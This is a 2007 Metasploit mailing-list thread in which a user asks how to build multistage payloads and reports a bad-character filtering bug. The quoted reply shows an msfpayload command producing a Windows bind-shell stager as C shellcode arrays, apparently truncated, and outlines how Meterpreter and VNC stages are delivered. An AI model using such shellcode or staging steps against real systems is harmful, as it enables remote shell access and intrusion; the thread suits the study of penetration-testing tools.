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Building multistage payloaded exploits?

From: j_fast_and_the_furious at (scotty to hotty)
Date: Mon, 24 Sep 2007 23:02:15 +0000

Thnx hdm for clarifying my research :P. now, i noticed problems when i specify bad characters in metasploit.... it 
always spits the payload out with the bad characters still in the exploit.... when i use msf2 it works fine but when i 
use msf3 it keeps everything i specify to get removed. any work arrounds to this problem? or am i doing something wrong?

----------------------------------------> From: hdm at> To: framework at> Date: Mon, 24 
Sep 2007 16:36:36 -0500> Subject: Re: [framework] Building multistage payloaded exploits?>> The multistaged stuff isn't 
simple to implement outside of Metasploit.> There are intermediate stages and in some cases (Meterpreter) entire> 
client-side libraries that need to be used.>> If you want to use a "simple" stager (2 pieces), then msfpayload will> 
generate the correct blocks for you. For example:>> $ msfpayload windows/shell/bind_tcp LPORT=12345 C> /*> * 
windows/shell/bind_tcp - 201 bytes (stage 1)> *> * EXITFUNC=seh, LPORT=12345> */> unsigned 
char buf[] => "\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"> 
"\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"> "\x66\xb9\xc0\x38\xff\xe6";>> /*> * 
windows/shell/bind_tcp - 474 bytes (stage 2)> *> */> unsigned char buf[] => 
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"> "\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";>> If you want 
to use VNCInject or Meterpreter, it looks like:>> 1) Send the basic stager (same as stage 1 above)> 2) Send the 
intermediate stager (89 bytes)> 3) Send the DLLInject stager (~2800 bytes)> 4) Send the DLL itself (150k~+ bytes)> 5) 
Talk to the payload socket and handle the DLL> 6) Handle VNC or Meterpreter protocols>> Use something like Wireshark to 
match up the exploit output (sending> stage...) with the network traffic. If it was trivial, we would not have> needed 
all this Ruby code to do it ;-)>> -HD>>> On Monday 24 September 2007 16:12, scotty to hotty wrote:>> well since you'r 
on i was wondering if you can point me to an exploit>> with multistaged payloads? i need to learn how to do it in 
multiple>> stages instead of single.... i would like to find out how to do a>> multistage instead of single; heck i 
even tried finding out how using>> Paterva Maltego and it couldn't find anything i didnt already know....>> and>> On 
Saturday 22 September 2007 20:34, scotty to hotty wrote:>> can anyone help me out on how i could add some multistaged 
payload to>> my exploit? i only know how to use single stage shellcodes.... any help>> will be appreciated.>>

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